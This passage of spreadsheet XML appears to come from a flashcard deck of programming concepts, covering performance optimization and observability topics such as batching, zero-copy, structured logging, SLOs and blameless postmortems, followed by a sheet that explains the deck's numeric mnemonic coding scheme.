        <is>
          <t>Performance: optimization</t>
        </is>
      </c>
    </row>
    <row r="985">
      <c r="A985" t="n">
        <v>0</v>
      </c>
      <c r="B985" t="inlineStr">
        <is>
          <t>983</t>
        </is>
      </c>
      <c r="C985" t="inlineStr">
        <is>
          <t>Batching round trips</t>
        </is>
      </c>
      <c r="D985" t="inlineStr">
        <is>
          <t>The courier stops making a hundred round trips for a hundred parcels and loads one truck: the fixed toll per trip - the network round-trip - is paid once instead of a hundred times.</t>
        </is>
      </c>
      <c r="E985" t="inlineStr">
        <is>
          <t>Combine many small network or disk operations into one request, paying the fixed per-trip latency once instead of N times.</t>
        </is>
      </c>
      <c r="F985" t="inlineStr">
        <is>
          <t>1,000 INSERTs -&gt; one bulk insert / GET /users?ids=1,2,...,50 / redis: MGET / pipelined commands</t>
        </is>
      </c>
      <c r="G985" t="inlineStr">
        <is>
          <t>N+1 problem - N+1 is the disease (one query per item); batching is the general cure for chatty I/O.</t>
        </is>
      </c>
      <c r="H985" t="inlineStr">
        <is>
          <t>One shopping trip with a list versus a drive per grocery.</t>
        </is>
      </c>
      <c r="J985" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K985" t="inlineStr">
        <is>
          <t>Performance: optimization</t>
        </is>
      </c>
    </row>
    <row r="986">
      <c r="A986" t="n">
        <v>0</v>
      </c>
      <c r="B986" t="inlineStr">
        <is>
          <t>984</t>
        </is>
      </c>
      <c r="C986" t="inlineStr">
        <is>
          <t>Zero-copy</t>
        </is>
      </c>
      <c r="D986" t="inlineStr">
        <is>
          <t>Instead of retyping the memo for every department, the clerk pins ONE copy to the corkboard and hands out arrows pointing at it.</t>
        </is>
      </c>
      <c r="E986" t="inlineStr">
        <is>
          <t>Move data without duplicating buffers: sendfile, memory mapping and buffer views let the kernel or consumer read the same bytes in place.</t>
        </is>
      </c>
      <c r="F986" t="inlineStr">
        <is>
          <t>os.sendfile(sock, f, 0, n)  # disk -&gt; socket inside the kernel / memoryview(buf)[a:b]  # slice, no copy</t>
        </is>
      </c>
      <c r="G986" t="inlineStr">
        <is>
          <t>vs shallow copy (345): shallow copy still allocates a new outer object; zero-copy shares the SAME bytes through views</t>
        </is>
      </c>
      <c r="H986" t="inlineStr">
        <is>
          <t>passing the original painting instead of prints</t>
        </is>
      </c>
      <c r="J986" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K986" t="inlineStr">
        <is>
          <t>Performance: optimization</t>
        </is>
      </c>
    </row>
    <row r="987">
      <c r="A987" t="n">
        <v>0</v>
      </c>
      <c r="B987" t="inlineStr">
        <is>
          <t>985</t>
        </is>
      </c>
      <c r="C987" t="inlineStr">
        <is>
          <t>Lazy loading</t>
        </is>
      </c>
      <c r="D987" t="inlineStr">
        <is>
          <t>The chef cooks nothing until a dish is actually ordered - no two-hundred-course banquet prepared for a guest who only wants soup. Images below the fold stay raw until you scroll.</t>
        </is>
      </c>
      <c r="E987" t="inlineStr">
        <is>
          <t>Defer creating or fetching a resource until first use, saving the work in the common case where it is never needed.</t>
        </is>
      </c>
      <c r="F987" t="inlineStr">
        <is>
          <t>img loading=lazy below the fold / import heavy_module inside the rare handler / ORM relations load on first access (mind the N+1)</t>
        </is>
      </c>
      <c r="G987" t="inlineStr">
        <is>
          <t>Eager loading - eager pays upfront to avoid later stalls and fixes N+1; lazy avoids possibly-unneeded work.</t>
        </is>
      </c>
      <c r="H987" t="inlineStr">
        <is>
          <t>A drawbridge lowered only when someone actually arrives.</t>
        </is>
      </c>
      <c r="J987" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K987" t="inlineStr">
        <is>
          <t>Performance: optimization</t>
        </is>
      </c>
    </row>
    <row r="988">
      <c r="A988" t="n">
        <v>0</v>
      </c>
      <c r="B988" t="inlineStr">
        <is>
          <t>986</t>
        </is>
      </c>
      <c r="C988" t="inlineStr">
        <is>
          <t>Allocation pressure</t>
        </is>
      </c>
      <c r="D988" t="inlineStr">
        <is>
          <t>Every request throws confetti (short-lived objects); soon the janitor (the GC) halts the whole party to sweep the floor. Throw less confetti, suffer fewer world-stopping sweeps.</t>
        </is>
      </c>
      <c r="E988" t="inlineStr">
        <is>
          <t>High rates of short-lived object allocation force frequent GC pauses; allocating less in hot loops smooths latency.</t>
        </is>
      </c>
      <c r="F988" t="inlineStr">
        <is>
          <t>string concat in a loop -&gt; join / builder / read into one preallocated buffer, reuse it / GC log: minor collections every 40 ms</t>
        </is>
      </c>
      <c r="G988" t="inlineStr">
        <is>
          <t>Memory leak - a leak is memory that never gets freed and grows; pressure is fast churn of short-lived objects triggering GC.</t>
        </is>
      </c>
      <c r="H988" t="inlineStr">
        <is>
          <t>A snowed-in plow that stops all traffic to clear the road.</t>
        </is>
      </c>
      <c r="J988" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K988" t="inlineStr">
        <is>
          <t>Performance: optimization</t>
        </is>
      </c>
    </row>
    <row r="989">
      <c r="A989" t="n">
        <v>0</v>
      </c>
      <c r="B989" t="inlineStr">
        <is>
          <t>987</t>
        </is>
      </c>
      <c r="C989" t="inlineStr">
        <is>
          <t>Object pooling</t>
        </is>
      </c>
      <c r="D989" t="inlineStr">
        <is>
          <t>Instead of sewing a new tuxedo for every guest and burning it afterward, the rental shop keeps a rack: take one, wear it, return it cleaned. Beware what's left in the pockets.</t>
        </is>
      </c>
      <c r="E989" t="inlineStr">
        <is>
          <t>Reuse expensive objects - connections, threads, buffers - from a pool instead of create-use-destroy per task, amortizing setup cost.</t>
        </is>
      </c>
      <c r="F989" t="inlineStr">
        <is>
          <t>DB pool: 20 connections, borrow and return / thread pool executor, not thread-per-task / reset state on return or the next borrower inherits it</t>
        </is>
      </c>
      <c r="G989" t="inlineStr">
        <is>
          <t>Caching - a cache reuses VALUES looked up by key; a pool reuses blank capacity containers regardless of content.</t>
        </is>
      </c>
      <c r="H989" t="inlineStr">
        <is>
          <t>A library of hammers checked out and returned.</t>
        </is>
      </c>
      <c r="J989" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K989" t="inlineStr">
        <is>
          <t>Performance: optimization</t>
        </is>
      </c>
    </row>
    <row r="990">
      <c r="A990" t="n">
        <v>0</v>
      </c>
      <c r="B990" t="inlineStr">
        <is>
          <t>988</t>
        </is>
      </c>
      <c r="C990" t="inlineStr">
        <is>
          <t>Precomputed lookup table</t>
        </is>
      </c>
      <c r="D990" t="inlineStr">
        <is>
          <t>A wizard who spent one long winter writing every possible answer into a leather codex; now each question is a single page-flip while rivals re-derive from scratch.</t>
        </is>
      </c>
      <c r="E990" t="inlineStr">
        <is>
          <t>Trade memory for time: compute all answers once at build or startup, then replace repeated work with an O(1) table lookup.</t>
        </is>
      </c>
      <c r="F990" t="inlineStr">
        <is>
          <t>SIN = [math.sin(2*math.pi*i/1024) for i in range(1024)] / y = SIN[phase &amp; 1023]</t>
        </is>
      </c>
      <c r="G990" t="inlineStr">
        <is>
          <t>vs memoization (253): memoization fills the table lazily on demand; precomputation fills it entirely up front | vs caching (75x): caches evict; a lookup table is permanent</t>
        </is>
      </c>
      <c r="H990" t="inlineStr">
        <is>
          <t>multiplication table taped inside a pencil case</t>
        </is>
      </c>
      <c r="J990" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K990" t="inlineStr">
        <is>
          <t>Performance: optimization</t>
        </is>
      </c>
    </row>
    <row r="991">
      <c r="A991" t="n">
        <v>0</v>
      </c>
      <c r="B991" t="inlineStr">
        <is>
          <t>989</t>
        </is>
      </c>
      <c r="C991" t="inlineStr">
        <is>
          <t>Premature optimization</t>
        </is>
      </c>
      <c r="D991" t="inlineStr">
        <is>
          <t>The chef spends all night honing one knife to a mirror edge - before the menu is even decided; dinner turns out to be soup. The whetstone was real, the need imagined.</t>
        </is>
      </c>
      <c r="E991" t="inlineStr">
        <is>
          <t>Optimizing before profiling, or before the design settles, trades clarity for imagined speed - Knuth's root of all evil, ~97% of the time.</t>
        </is>
      </c>
      <c r="F991" t="inlineStr">
        <is>
          <t>hand-rolled bit-trick loop saves 3 us per day / code now unreadable - and the bottleneck was I/O / write clear code; optimize measured hot spots</t>
        </is>
      </c>
      <c r="G991" t="inlineStr">
        <is>
          <t>Choosing sane algorithms upfront - picking O(n log n) is design, not prematurity; contorting code without measurements is.</t>
        </is>
      </c>
      <c r="H991" t="inlineStr">
        <is>
          <t>Polishing hubcaps while the engine is still on the bench.</t>
        </is>
      </c>
      <c r="J991" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K991" t="inlineStr">
        <is>
          <t>Performance: optimization</t>
        </is>
      </c>
    </row>
    <row r="992">
      <c r="A992" t="n">
        <v>0</v>
      </c>
      <c r="B992" t="inlineStr">
        <is>
          <t>990</t>
        </is>
      </c>
      <c r="C992" t="inlineStr">
        <is>
          <t>Observability</t>
        </is>
      </c>
      <c r="D992" t="inlineStr">
        <is>
          <t>Flying at night, the cockpit's gauges, radar, and voice recorder let you investigate questions you never planned - versus a single 'ENGINE OK?' idiot light. Three windows into one flight.</t>
        </is>
      </c>
      <c r="E992" t="inlineStr">
        <is>
          <t>Instrument systems with logs, metrics, and traces so you can ask NEW questions about unknown failure modes without shipping code.</t>
        </is>
      </c>
      <c r="F992" t="inlineStr">
        <is>
          <t>logs: what happened; metrics: how much / traces: where in the request path / debug the 3 AM incident without a redeploy</t>
        </is>
      </c>
      <c r="G992" t="inlineStr">
        <is>
          <t>Monitoring - monitoring watches KNOWN failure modes on preset dashboards; observability lets you explore unknown ones.</t>
        </is>
      </c>
      <c r="H992" t="inlineStr">
        <is>
          <t>A glass-bottomed boat over an opaque ocean.</t>
        </is>
      </c>
      <c r="J992" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K992" t="inlineStr">
        <is>
          <t>Observability &amp; operations</t>
        </is>
      </c>
    </row>
    <row r="993">
      <c r="A993" t="n">
        <v>0</v>
      </c>
      <c r="B993" t="inlineStr">
        <is>
          <t>991</t>
        </is>
      </c>
      <c r="C993" t="inlineStr">
        <is>
          <t>Structured logging</t>
        </is>
      </c>
      <c r="D993" t="inlineStr">
        <is>
          <t>The librarian swaps diary scrawl for index cards with labeled fields - user_id: 42, order: A7, ms: 340 - and suddenly a machine finds every card where ms &gt; 1000 in seconds.</t>
        </is>
      </c>
      <c r="E993" t="inlineStr">
        <is>
          <t>Emit logs as key-value events (JSON) with level, timestamp, and correlation IDs - machine-queryable, not prose strings.</t>
        </is>
      </c>
      <c r="F993" t="inlineStr">
        <is>
          <t>log.info('order_placed', order_id=417, ms=92) / query: level=error AND service=checkout / versus grep-ing 'Order 417 was placed OK!!'</t>
        </is>
      </c>
      <c r="G993" t="inlineStr">
        <is>
          <t>Metrics - a log records each discrete event in rich detail; metrics pre-aggregate cheap numbers over time.</t>
        </is>
      </c>
      <c r="H993" t="inlineStr">
        <is>
          <t>Barcodes replacing handwritten shelf notes.</t>
        </is>
      </c>
      <c r="J993" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K993" t="inlineStr">
        <is>
          <t>Observability &amp; operations</t>
        </is>
      </c>
    </row>
    <row r="994">
      <c r="A994" t="n">
        <v>0</v>
      </c>
      <c r="B994" t="inlineStr">
        <is>
          <t>992</t>
        </is>
      </c>
      <c r="C994" t="inlineStr">
        <is>
          <t>Metrics: RED &amp; USE</t>
        </is>
      </c>
      <c r="D994" t="inlineStr">
        <is>
          <t>The nurse carries two clipboards: for each SERVICE she charts Rate, Errors, Duration; for each ORGAN-resource (CPU-heart, RAM-lungs) Utilization, Saturation, Errors. Vitals, not anecdotes.</t>
        </is>
      </c>
      <c r="E994" t="inlineStr">
        <is>
          <t>Per service track Rate, Errors, Duration (RED); per resource track Utilization, Saturation, Errors (USE) - the core dashboards.</t>
        </is>
      </c>
      <c r="F994" t="inlineStr">
        <is>
          <t>RED: req/s, 5xx %, p99 ms per endpoint / USE: CPU 85%, run-queue depth 12, IO errors / dashboards start here, not from vibes</t>
        </is>
      </c>
      <c r="G994" t="inlineStr">
        <is>
          <t>Logs - metrics are cheap pre-aggregated numbers for trends and alerts; logs carry per-event detail.</t>
        </is>
      </c>
      <c r="H994" t="inlineStr">
        <is>
          <t>Two dashboards: one for waiters, one for the kitchen equipment.</t>
        </is>
      </c>
      <c r="J994" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K994" t="inlineStr">
        <is>
          <t>Observability &amp; operations</t>
        </is>
      </c>
    </row>
    <row r="995">
      <c r="A995" t="n">
        <v>0</v>
      </c>
      <c r="B995" t="inlineStr">
        <is>
          <t>993</t>
        </is>
      </c>
      <c r="C995" t="inlineStr">
        <is>
          <t>Distributed tracing</t>
        </is>
      </c>
      <c r="D995" t="inlineStr">
        <is>
          <t>Drop a dyed relay baton (the trace ID) into the first runner's hand; every service stamps its split time on the same baton. Read it at the finish to see exactly which leg was slow.</t>
        </is>
      </c>
      <c r="E995" t="inlineStr">
        <is>
          <t>Propagate a trace/correlation ID across every service a request touches, recording timed spans that reconstruct the full journey.</t>
        </is>
      </c>
      <c r="F995" t="inlineStr">
        <is>
          <t>traceparent header flows A -&gt; B -&gt; C / span: db.query 210 ms inside POST /checkout / answer: which hop added the extra 2 s</t>
        </is>
      </c>
      <c r="G995" t="inlineStr">
        <is>
          <t>Profiling - a profile aggregates CPU across all work in one process; a trace follows ONE request across service boundaries.</t>
        </is>
      </c>
      <c r="H995" t="inlineStr">
        <is>
          <t>A dye packet flushed through the whole plumbing system.</t>
        </is>
      </c>
      <c r="J995" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K995" t="inlineStr">
        <is>
          <t>Observability &amp; operations</t>
        </is>
      </c>
    </row>
    <row r="996">
      <c r="A996" t="n">
        <v>0</v>
      </c>
      <c r="B996" t="inlineStr">
        <is>
          <t>994</t>
        </is>
      </c>
      <c r="C996" t="inlineStr">
        <is>
          <t>Alert on symptoms</t>
        </is>
      </c>
      <c r="D996" t="inlineStr">
        <is>
          <t>Page the doctor when the patient cannot breathe (users see errors), not every time some enzyme twitches (CPU hits 80%). Cause-alerts cry wolf at 3 AM until nobody comes.</t>
        </is>
      </c>
      <c r="E996" t="inlineStr">
        <is>
          <t>Page humans on user-visible impact - error rate, latency, SLO burn - not on causes like CPU; cause signals belong on dashboards.</t>
        </is>
      </c>
      <c r="F996" t="inlineStr">
        <is>
          <t>page: checkout error rate &gt; 1% for 5 min / ticket, not page: disk 80% full / every page must be urgent, real, actionable</t>
        </is>
      </c>
      <c r="G996" t="inlineStr">
        <is>
          <t>Cause-based alerts - invaluable for diagnosis AFTER the symptom page; paging on them breeds alert fatigue.</t>
        </is>
      </c>
      <c r="H996" t="inlineStr">
        <is>
          <t>A smoke alarm, not a lit-match counter.</t>
        </is>
      </c>
      <c r="J996" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K996" t="inlineStr">
        <is>
          <t>Observability &amp; operations</t>
        </is>
      </c>
    </row>
    <row r="997">
      <c r="A997" t="n">
        <v>0</v>
      </c>
      <c r="B997" t="inlineStr">
        <is>
          <t>995</t>
        </is>
      </c>
      <c r="C997" t="inlineStr">
        <is>
          <t>SLI, SLO, error budget</t>
        </is>
      </c>
      <c r="D997" t="inlineStr">
        <is>
          <t>The 99.9% SLO mints a monthly jar of 43 unreliability minutes (the error budget); the team spends coins on risky launches while the jar clinks, and freezes features when it empties.</t>
        </is>
      </c>
      <c r="E997" t="inlineStr">
        <is>
          <t>An SLI measures service health, an SLO sets its target, and the allowed shortfall - the error budget - prices how much risk to ship.</t>
        </is>
      </c>
      <c r="F997" t="inlineStr">
        <is>
          <t>SLI: % of requests served under 300 ms / SLO: 99.9% monthly -&gt; budget of 43 min / budget spent -&gt; freeze features, fix reliability</t>
        </is>
      </c>
      <c r="G997" t="inlineStr">
        <is>
          <t>SLA - the SLA is the external contract with penalties; SLOs are stricter internal targets that protect it.</t>
        </is>
      </c>
      <c r="H997" t="inlineStr">
        <is>
          <t>A monthly allowance for breaking things.</t>
        </is>
      </c>
      <c r="J997" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K997" t="inlineStr">
        <is>
          <t>Observability &amp; operations</t>
        </is>
      </c>
    </row>
    <row r="998">
      <c r="A998" t="n">
        <v>0</v>
      </c>
      <c r="B998" t="inlineStr">
        <is>
          <t>996</t>
        </is>
      </c>
      <c r="C998" t="inlineStr">
        <is>
          <t>Health checks</t>
        </is>
      </c>
      <c r="D998" t="inlineStr">
        <is>
          <t>The load balancer knocks on each server's door every few seconds: 'You alive? Ready for guests?' Two silences and your name quietly leaves the rotation - no guest is ever sent to the dark room.</t>
        </is>
      </c>
      <c r="E998" t="inlineStr">
        <is>
          <t>Endpoints reporting liveness (process up - restart if not) and readiness (able to serve - else remove from rotation).</t>
        </is>
      </c>
      <c r="F998" t="inlineStr">
        <is>
          <t>GET /healthz -&gt; 200 (liveness) / GET /ready checks DB and dependencies / k8s: failing readiness pulls the pod from the LB</t>
        </is>
      </c>
      <c r="G998" t="inlineStr">
        <is>
          <t>Liveness vs readiness - liveness failure restarts the pod; readiness failure only stops traffic to it.</t>
        </is>
      </c>
      <c r="H998" t="inlineStr">
        <is>
          <t>A pulse check versus a fit-for-duty check.</t>
        </is>
      </c>
      <c r="J998" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K998" t="inlineStr">
        <is>
          <t>Observability &amp; operations</t>
        </is>
      </c>
    </row>
    <row r="999">
      <c r="A999" t="n">
        <v>0</v>
      </c>
      <c r="B999" t="inlineStr">
        <is>
          <t>997</t>
        </is>
      </c>
      <c r="C999" t="inlineStr">
        <is>
          <t>Graceful shutdown</t>
        </is>
      </c>
      <c r="D999" t="inlineStr">
        <is>
          <t>On SIGTERM the bartender calls LAST ORDERS: door closed to newcomers, in-flight drinks finished and paid, tabs written down - then lights out. No glass is snatched mid-sip.</t>
        </is>
      </c>
      <c r="E999" t="inlineStr">
        <is>
          <t>On SIGTERM: stop accepting new work, finish or hand off in-flight requests, flush buffers, release connections, then exit.</t>
        </is>
      </c>
      <c r="F999" t="inlineStr">
        <is>
          <t>trap SIGTERM: server.stop_accepting() / drain in-flight (30s timeout), flush logs / k8s: readiness off -&gt; SIGTERM -&gt; SIGKILL after grace</t>
        </is>
      </c>
      <c r="G999" t="inlineStr">
        <is>
          <t>Crash-only design - that engineers safe recovery from abrupt kills; graceful shutdown avoids dropping work at all.</t>
        </is>
      </c>
      <c r="H999" t="inlineStr">
        <is>
          <t>A theater ushering out act by act instead of cutting the power.</t>
        </is>
      </c>
      <c r="J999" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K999" t="inlineStr">
        <is>
          <t>Observability &amp; operations</t>
        </is>
      </c>
    </row>
    <row r="1000">
      <c r="A1000" t="n">
        <v>0</v>
      </c>
      <c r="B1000" t="inlineStr">
        <is>
          <t>998</t>
        </is>
      </c>
      <c r="C1000" t="inlineStr">
        <is>
          <t>Incident response</t>
        </is>
      </c>
      <c r="D1000" t="inlineStr">
        <is>
          <t>The fire alarm hands out hats, not blame: one incident commander decides, a scribe timestamps everything, the rest fight flames. Roll back and stop the bleeding FIRST; autopsy later.</t>
        </is>
      </c>
      <c r="E1000" t="inlineStr">
        <is>
          <t>A practiced structure for outages: clear roles - commander, comms, scribe - mitigate first, diagnose after, communicate on a cadence.</t>
        </is>
      </c>
      <c r="F1000" t="inlineStr">
        <is>
          <t>sev1 declared; IC assigned within 5 min / mitigate first: roll back before root-causing / scribe's timeline feeds the postmortem</t>
        </is>
      </c>
      <c r="G1000" t="inlineStr">
        <is>
          <t>Postmortem - response happens DURING the fire; the postmortem is the learning exercise after it is out.</t>
        </is>
      </c>
      <c r="H1000" t="inlineStr">
        <is>
          <t>An ER trauma team: stabilize first, diagnose second.</t>
        </is>
      </c>
      <c r="J1000" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K1000" t="inlineStr">
        <is>
          <t>Observability &amp; operations</t>
        </is>
      </c>
    </row>
    <row r="1001">
      <c r="A1001" t="n">
        <v>0</v>
      </c>
      <c r="B1001" t="inlineStr">
        <is>
          <t>999</t>
        </is>
      </c>
      <c r="C1001" t="inlineStr">
        <is>
          <t>Blameless postmortem</t>
        </is>
      </c>
      <c r="D1001" t="inlineStr">
        <is>
          <t>The team gathers around the fallen server like surgeons around a teaching cadaver: they dissect the system's organs, never the intern's hands. Slot 999: five nines end not in punishment but in learning.</t>
        </is>
      </c>
      <c r="E1001" t="inlineStr">
        <is>
          <t>After an incident, analyze how the SYSTEM let the failure happen - never who to punish - so people share truth and fixes compound.</t>
        </is>
      </c>
      <c r="F1001" t="inlineStr">
        <is>
          <t>doc: timeline, impact, causes, action items / ask 'what made that mistake easy?' never 'who?' / actions get owners: add canary, drill rollback</t>
        </is>
      </c>
      <c r="G1001" t="inlineStr">
        <is>
          <t>Blame-free vs accountability-free - blameless targets system causes, yet every action item still gets a named owner and deadline.</t>
        </is>
      </c>
      <c r="H1001" t="inlineStr">
        <is>
          <t>A black-box flight recorder read aloud without a courtroom.</t>
        </is>
      </c>
      <c r="J1001" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K1001" t="inlineStr">
        <is>
          <t>Observability &amp; operations</t>
        </is>
      </c>
    </row>
    <row r="1004">
      <c r="A1004">
        <f>SUM(A2:A1003)</f>
        <v/>
      </c>
      <c r="B1004" t="inlineStr">
        <is>
          <t>learned / 1000</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:P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10"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s>
  <sheetData>
    <row r="1">
      <c r="A1" s="2" t="inlineStr">
        <is>
          <t>The code IS the mnemonic: hundreds digit = domain, tens = category, units = item (0 = most fundamental).</t>
        </is>
      </c>
    </row>
    <row r="2">
      <c r="A2" t="inlineStr">
        <is>
          <t>Retrieval route: code -&gt; digit mnemonics -&gt; category -&gt; concept, or fuse the code's French Millenium peg image (01.Millenium) with the Anchor scene.</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="3" t="inlineStr">
        <is>
          <t>Digit</t>
        </is>
      </c>
      <c r="B4" s="3" t="inlineStr">
        <is>
          <t>Domain</t>
        </is>
      </c>
      <c r="C4" s="3" t="inlineStr">
        <is>
          <t>Digit mnemonic</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" t="n">
        <v>0</v>
      </c>
      <c r="B5" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="C5" t="inlineStr">
        <is>
          <t>0 is the empty origin: null, zero, the blank slate every program starts from</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" t="n">
        <v>1</v>
      </c>
      <c r="B6" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="C6" t="inlineStr">
        <is>
          <t>1 looks like a single node or cell - data as items chained one to the next</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" t="n">
        <v>2</v>
      </c>
      <c r="B7" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="C7" t="inlineStr">
        <is>
          <t>2 = binary: compare two things, split in two - binary search, O(n^2) pairwise comparisons</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" t="n">
        <v>3</v>
      </c>
      <c r="B8" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="C8" t="inlineStr">
        <is>
          <t>rule of three: input -&gt; transform -&gt; output; the lambda</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" t="n">
        <v>4</v>
      </c>
      <c r="B9" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="C9" t="inlineStr">
        <is>
          <t>the FOUR pillars: encapsulation, abstraction, inheritance, polymorphism</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" t="n">
        <v>5</v>
      </c>
      <c r="B10" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="C10" t="inlineStr">
        <is>
          <t>FIVE dining philosophers around the table</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" t="n">
        <v>6</v>
      </c>
      <c r="B11" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="C11" t="inlineStr">
        <is>
          <t>SIX sides of the hexagon - hexagonal architecture</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" t="n">
        <v>7</v>
      </c>
      <c r="B12" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="C12" t="inlineStr">
        <is>
          <t>SEVEN normal forms to tame your tables</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" t="n">
        <v>8</v>
      </c>
      <c r="B13" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="C13" t="inlineStr">
        <is>
          <t>8 = port 80; an infinity symbol of machines connected sideways</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" t="n">
        <v>9</v>
      </c>
      <c r="B14" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="C14" t="inlineStr">
        <is>
          <t>five NINES - 99.999%: the digit of never failing</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="2" t="inlineStr">
        <is>
          <t>Category grid (row = domain digit, column = tens digit)</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="B18" s="3" t="inlineStr">
        <is>
          <t>_0_</t>
        </is>
      </c>
      <c r="C18" s="3" t="inlineStr">
        <is>
          <t>_1_</t>
        </is>
      </c>
      <c r="D18" s="3" t="inlineStr">
        <is>
          <t>_2_</t>
        </is>
      </c>
      <c r="E18" s="3" t="inlineStr">
        <is>
          <t>_3_</t>
        </is>
      </c>
      <c r="F18" s="3" t="inlineStr">
        <is>
          <t>_4_</t>
        </is>
      </c>
      <c r="G18" s="3" t="inlineStr">
        <is>
          <t>_5_</t>
        </is>
      </c>
      <c r="H18" s="3" t="inlineStr">
        <is>
          <t>_6_</t>
        </is>
      </c>
      <c r="I18" s="3" t="inlineStr">
        <is>
          <t>_7_</t>
        </is>
      </c>
      <c r="J18" s="3" t="inlineStr">
        <is>
          <t>_8_</t>
        </is>
      </c>
      <c r="K18" s="3" t="inlineStr">
        <is>
          <t>_9_</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="2" t="inlineStr">
        <is>
          <t>0xx</t>
        </is>
      </c>
      <c r="B19" t="inlineStr">
        <is>
          <t>Values &amp; primitive types</t>
        </is>
      </c>
      <c r="C19" t="inlineStr">
        <is>
          <t>Variables, bindings &amp; scope basics</t>
        </is>
      </c>
      <c r="D19" t="inlineStr">
        <is>
          <t>Operators &amp; expressions</t>
        </is>
      </c>
      <c r="E19" t="inlineStr">
        <is>
          <t>Control flow: branching</t>
        </is>
      </c>
      <c r="F19" t="inlineStr">
        <is>
          <t>Control flow: iteration</t>
        </is>
      </c>
      <c r="G19" t="inlineStr">
        <is>
          <t>Strings &amp; text encoding</t>
        </is>
      </c>
      <c r="H19" t="inlineStr">
        <is>
          <t>Numbers &amp; arithmetic pitfalls</t>
        </is>
      </c>
      <c r="I19" t="inlineStr">
        <is>
          <t>Errors &amp; exceptions</t>
        </is>
      </c>
      <c r="J19" t="inlineStr">
        <is>
          <t>Input/output &amp; files</t>
        </is>
      </c>
      <c r="K19" t="inlineStr">
        <is>
          <t>Memory model basics</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="2" t="inlineStr">
        <is>
          <t>1xx</t>
        </is>
      </c>
      <c r="B20" t="inlineStr">
        <is>
          <t>Arrays &amp; dynamic arrays</t>
        </is>
      </c>
      <c r="C20" t="inlineStr">
        <is>
          <t>Linked lists</t>
        </is>
      </c>
      <c r="D20" t="inlineStr">
        <is>
          <t>Stacks &amp; queues</t>
        </is>
      </c>
      <c r="E20" t="inlineStr">
        <is>
          <t>Hash tables &amp; sets</t>
        </is>
      </c>
      <c r="F20" t="inlineStr">
        <is>
          <t>Binary trees &amp; BSTs</t>
        </is>
      </c>
      <c r="G20" t="inlineStr">
        <is>
          <t>Balanced &amp; specialized trees</t>
        </is>
      </c>
      <c r="H20" t="inlineStr">
        <is>
          <t>Heaps &amp; priority queues</t>
        </is>
      </c>
      <c r="I20" t="inlineStr">
        <is>
          <t>Graphs: representation</t>
        </is>
      </c>
      <c r="J20" t="inlineStr">
        <is>
          <t>Probabilistic &amp; specialized structures</t>
        </is>
      </c>
      <c r="K20" t="inlineStr">
        <is>
          <t>Choosing structures: trade-offs</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="2" t="inlineStr">
        <is>
          <t>2xx</t>
        </is>
      </c>
      <c r="B21" t="inlineStr">
        <is>
          <t>Complexity &amp; Big-O</t>
        </is>
      </c>
      <c r="C21" t="inlineStr">
        <is>
          <t>Searching</t>
        </is>
      </c>
      <c r="D21" t="inlineStr">
        <is>
          <t>Sorting: comparison</t>
        </is>
      </c>
      <c r="E21" t="inlineStr">
        <is>
          <t>Sorting: non-comparison &amp; external</t>
        </is>
      </c>
      <c r="F21" t="inlineStr">
        <is>
          <t>Recursion &amp; divide-and-conquer</t>
